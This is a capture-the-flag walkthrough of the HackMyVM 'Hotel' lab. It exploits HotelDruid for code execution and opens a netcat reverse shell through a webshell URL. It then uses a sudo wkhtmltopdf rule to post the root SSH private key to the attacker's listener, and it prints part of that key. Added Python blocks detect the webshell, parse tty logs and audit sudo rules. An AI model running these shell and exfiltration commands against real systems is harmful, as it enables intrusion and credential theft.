HackMyVM - Hotel
Another nice machine from sML. It's classed as easy but it does have its challenges. It contains a really satisfying user escalation that is just beautiful; getting the root flag isn't too difficult, but I found it a bit more of a challenge to actually get root.
Find It
┌──(kali㉿kali)-[~/hotel]
└─$ sudo netdiscover -r 10.0.0.0/24 -P | tee findit
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:fe:f1:51 1 60 PCS Systemtechnik GmbH
10.0.0.38 08:00:27:cd:b0:5d 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Scan it
┌──(kali㉿kali)-[~/hotel]
└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.38
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-22 18:44 EST
Nmap scan report for 10.0.0.38
Host is up (0.00081s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 06:1f:a2:25:19:45:2b:2f:44:cc:74:7a:e2:9b:ab:ac (RSA)
| 256 6f:b9:da:fb:eb:6b:4c:de:33:63:b7:ce:f0:2f:f7:cd (ECDSA)
|_ 256 84:fb:1d:5c:4c:c6:60:e8:47:d8:2f:a0:92:8e:fb:18 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Hoteldruid
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.00 seconds
So it just looks like SSH and web.
The website is running something called 'HotelDruid'.
Searching exploit-db.com finds a published exploit script to download:
https://www.exploit-db.com/exploits/50754
RCE
┌──(kali㉿kali)-[~/hotel]
└─$ python3 ./50754.py -t http://10.0.0.38 --noauth
Exploit By - 0z09e (https://twitter.com/0z09e)
[*] Trying to access the Dashboard.
[*] Checking the privilege of the user.
[+] User has the privilege to add room.
[*] Adding a new room.
[+] Room has been added successfully.
[*] Testing code exection
[+] Code executed successfully, Go to http://10.0.0.38/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.
[+] Example : http://10.0.0.38/dati/selectappartamenti.php?cmd=id
[+] Example Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)
┌──(kali㉿kali)-[~/hotel]
└─$ curl http://10.0.0.38/dati/selectappartamenti.php?cmd=nc%20-e/bin/bash%2010.0.0.10%204444
This is sent whilst having a netcat listener ready to accept the connection:
┌──(kali㉿kali)-[~/hotel]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.38] 57262
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@hotel:~/html/hoteldruid/dati$
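On the defensive side, the exploit leaves a very recognisable trace: every command goes through the dropped file at /dati/selectappartamenti.php with a cmd query parameter. The following is an added example (mine, not code from the post or from the exploit script) that scans nginx access-log lines for that pattern and decodes the command; the log lines are constructed and assume nginx's default combined log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# nginx default "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Path of the PHP file the exploit turns into a webshell (from the exploit output above)
SHELL_PATH = "/dati/selectappartamenti.php"
# Tokens in the cmd value that point at a reverse shell rather than simple recon
SHELL_TOKENS = ("nc ", "/bin/bash", "/bin/sh")

# Constructed sample log lines, not taken from the target machine
SAMPLE_LOG = """\
10.0.0.10 - - [22/Feb/2022:18:50:01 -0500] "GET /hoteldruid/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.10 - - [22/Feb/2022:18:52:14 -0500] "GET /dati/selectappartamenti.php?cmd=id HTTP/1.1" 200 54 "-" "python-requests/2.27.1"
10.0.0.10 - - [22/Feb/2022:18:53:40 -0500] "GET /dati/selectappartamenti.php?cmd=nc%20-e/bin/bash%2010.0.0.10%204444 HTTP/1.1" 200 0 "-" "curl/7.81.0"
10.0.0.25 - - [22/Feb/2022:18:55:02 -0500] "GET /hoteldruid/index.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_webshell_hits(log_text):
    """Flag every request to the dropped webshell that carries a cmd parameter."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["url"])
        query = parse_qs(parts.query)  # also percent-decodes the values
        if not (parts.path.endswith(SHELL_PATH) and "cmd" in query):
            continue
        cmd = query["cmd"][0]
        severity = "high" if any(t in cmd for t in SHELL_TOKENS) else "medium"
        hits.append({"ip": rec["ip"], "ts": rec["ts"], "ua": rec["ua"],
                     "cmd": cmd, "severity": severity})
    return hits

if __name__ == "__main__":
    for h in find_webshell_hits(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} [{h["severity"]}] cmd={h["cmd"]!r} ua={h["ua"]}')
```

The room-creation request that plants the PHP in the first place is harder to spot from access logs alone, so the cmd hits are the reliable signal; any PHP execution under the dati/ data directory is worth alerting on.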
Escalate to user
www-data@hotel:~/html$ pwd
pwd
/var/www/html
www-data@hotel:~/html$ ls -al
ls -al
total 16
drwxr-xr-x 3 root root 4096 Feb 20 15:12 .
drwxr-xr-x 3 root root 4096 Feb 20 14:42 ..
drwxr-xr-x 7 person person 4096 Aug 18 2021 hoteldruid
-rw-r--r-- 1 www-data www-data 1592 Feb 20 15:11 ttylog
www-data@hotel:~/html$
Transferring ttylog to Kali and having a brief look at it with strings and hexedit identified it, as the name suggests, as a raw log of a tty session, but it is difficult to pick out exactly what it contains because of the control characters etc.
Researching how to replay tty logs identifies 'ipbt':
http://manpages.ubuntu.com/manpages/impish/man1/ipbt.1.html
┌──(kali㉿kali)-[~/hotel]
└─$ ipbt -A ttylog
Reading ttylog (ttyrec) ... 103 frames
Total 103 frames, 1592 bytes loaded, 31585400 bytes of memory used
Total loading time: 0 seconds (0 sec/Mb)
With the password and only one user account (person) on the server, we can just SSH in with those credentials.
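For the forensic side of this step, it helps to know what ipbt is actually counting. A ttyrec file is a sequence of frames, each a 12-byte little-endian header (seconds, microseconds, payload length) followed by the raw terminal bytes. The reader below is an added example (mine, not from the post and not ipbt's code) that walks those frames and renders the stream as plain text, dropping escape sequences and honouring backspaces so corrections in the session come out the way they appeared on screen. The session bytes are constructed, not the machine's ttylog.

```python
import re
import struct

HEADER = struct.Struct("<III")  # ttyrec frame header: sec, usec, len (little-endian uint32)

# CSI sequences, OSC sequences (BEL-terminated) and two-byte ESC sequences
ESCAPE_RE = re.compile(rb"\x1b\[[0-?]*[ -/]*[@-~]|\x1b\][^\x07]*\x07|\x1b[@-Z\\-_]")

def read_frames(data):
    """Parse raw ttyrec bytes into a list of (timestamp, payload) tuples."""
    frames, off = [], 0
    while off + HEADER.size <= len(data):
        sec, usec, n = HEADER.unpack_from(data, off)
        off += HEADER.size
        payload = data[off:off + n]
        if len(payload) != n:
            raise ValueError(f"truncated frame at offset {off}: want {n}, have {len(payload)}")
        frames.append((sec + usec / 1_000_000, payload))
        off += n
    if off != len(data):
        raise ValueError(f"{len(data) - off} trailing bytes after the last frame")
    return frames

def summary(frames):
    """(frame count, payload bytes, wall-clock duration) like ipbt's load report."""
    return len(frames), sum(len(p) for _, p in frames), frames[-1][0] - frames[0][0]

def render_plain(frames):
    """Replay the output stream into readable text: strip escapes, apply backspace."""
    out = []
    for b in ESCAPE_RE.sub(b"", b"".join(p for _, p in frames)):
        if b in (0x08, 0x7F):            # backspace / DEL erase the last visible char
            if out and out[-1] != "\n":
                out.pop()
        elif b == 0x0A or 0x20 <= b < 0x7F:
            out.append(chr(b))           # newline and printable ASCII are kept
        # carriage return and other control bytes are cursor motion only: dropped
    return "".join(out)

def _frame(sec, usec, payload):
    return HEADER.pack(sec, usec, len(payload)) + payload

# Constructed sample session: a typo corrected with backspace, then a coloured ls listing
SAMPLE_TTYREC = b"".join([
    _frame(1645561200, 0, b"person@hotel:~$ "),
    _frame(1645561201, 250000, b"l"), _frame(1645561201, 400000, b"s"),
    _frame(1645561201, 500000, b"x"), _frame(1645561202, 0, b"\x08 \x08"),
    _frame(1645561202, 300000, b"\r\n"),
    _frame(1645561202, 310000, b"\x1b[0m\x1b[01;34mhoteldruid\x1b[0m  ttylog\r\n"),
    _frame(1645561202, 320000, b"person@hotel:~$ "),
])
```

Because the shell echoes keystrokes, anything typed at a visible prompt ends up in the rendered text, which is exactly why a world-readable ttylog under the web root is a finding in its own right.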
Escalate to root
person@hotel:~$ sudo -l
Matching Defaults entries for person on hotel:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User person may run the following commands on hotel:
(root) NOPASSWD: /usr/bin/wkhtmltopdf
person@hotel:~$
So getting the root flag is quite easy:
person@hotel:~$ sudo /usr/bin/wkhtmltopdf /root/root.txt root.pdf
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Loading page (1/2)
Printing pages (2/2)
Done
person@hotel:~$
Transfer the PDF to a machine with a PDF reader and just read it.
I wanted to actually get root rather than just read the flag, so I kept at it for a while.
Trying a number of different methods to get the .ssh/id_rsa gave odd errors about WebKit error 102...
Reading the extended help shows the options, including support for posting files...
So, running netcat on Kali to listen on port 8000 and posting the file instead:
person@hotel:~$ sudo /usr/bin/wkhtmltopdf --post-file 'file' /root/.ssh/id_rsa http://10.0.0.10:8000/ out.pdf
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Loading page (1/2)
[> ] 0%
┌──(kali㉿kali)-[~/hotel]
└─$ nc -nvlp 8000
listening on [any] 8000 ...
connect to [10.0.0.10] from (UNKNOWN) [10.0.0.38] 39274
POST / HTTP/1.1
Host: 10.0.0.10:8000
Content-Type: multipart/form-data, boundary=57c78b70dca44402aea07ac60c3e581d
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/602.1 (KHTML, like Gecko) wkhtmltopdf Version/10.0 Safari/602.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: null
Content-Length: 2727
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,en,*
--57c78b70dca44402aea07ac60c3e581d
content-disposition: form-data; name="file"; filename="id_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAtumGaKJe1rTvvHIay2XsiU7x3Jsm6atRdtGPxI1HbpriIXAzAumN
DI/+eIbZWIcX0P5fQcSYH+j+MPs9X/xB0sQ1niwdxzuj6V2ZhiTN1gPpGHLNyyZcu7U2KK
Then it's just a case of copying the key to a file, setting the permissions correctly and connecting as root.
┌──(kali㉿kali)-[~/hotel]
└─$ chmod 600 root.key
┌──(kali㉿kali)-[~/hotel]
└─$ ssh root@10.0.0.38 -i root.key
Linux hotel 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 22 17:45:01 2022 from 10.0.0.10
root@hotel:~#
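The root path comes down to a single sudo rule: a passwordless root entry for a converter that reads any file it is pointed at. The check below is an added example (mine, not from the post) that parses sudo -l output like the one above and grades each rule, treating wkhtmltopdf as a file-reading binary for the reason this machine demonstrates. The sudo -l text and the FILE_READERS table are constructed for illustration.

```python
import re

# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /usr/bin/wkhtmltopdf"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# Binaries that read arbitrary local files when run as root (illustrative table;
# wkhtmltopdf is the one on this page: it rendered /root/root.txt and POSTed id_rsa)
FILE_READERS = {
    "wkhtmltopdf": "renders any readable file to PDF and can send files out with --post-file",
}

# Constructed sudo -l output modelled on the page's, with two extra rules for contrast
SAMPLE_SUDO_L = r"""
Matching Defaults entries for person on hotel:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User person may run the following commands on hotel:
    (root) NOPASSWD: /usr/bin/wkhtmltopdf
    (root) /usr/bin/systemctl restart nginx
    (root) NOPASSWD: /usr/bin/systemctl status nginx
"""

def parse_sudo_l(text):
    """Return one dict per command in the 'may run the following commands' section."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        m = RULE_RE.match(line.strip()) if in_cmds else None
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip()      # "(root)" or "(ALL : ALL)"
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(","):
            rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "cmd": cmd.strip()})
    return rules

def audit(rules):
    """Grade each rule: critical / high / review; rules that still need a password are skipped."""
    findings = []
    for r in rules:
        as_root = r["runas"] in ("root", "ALL")
        exe = r["cmd"].split()[0].rsplit("/", 1)[-1]
        if as_root and r["cmd"] == "ALL":
            findings.append((r["cmd"], "critical", "unrestricted root"))
        elif as_root and r["nopasswd"] and exe in FILE_READERS:
            findings.append((r["cmd"], "high", FILE_READERS[exe]))
        elif as_root and r["nopasswd"]:
            findings.append((r["cmd"], "review", "passwordless root: confirm the command cannot be abused"))
    return findings
```

A rule graded high is a root file-read primitive no matter how the arguments are restricted, so the fix is to remove it or run the converter as a dedicated unprivileged account rather than to tighten the sudoers line.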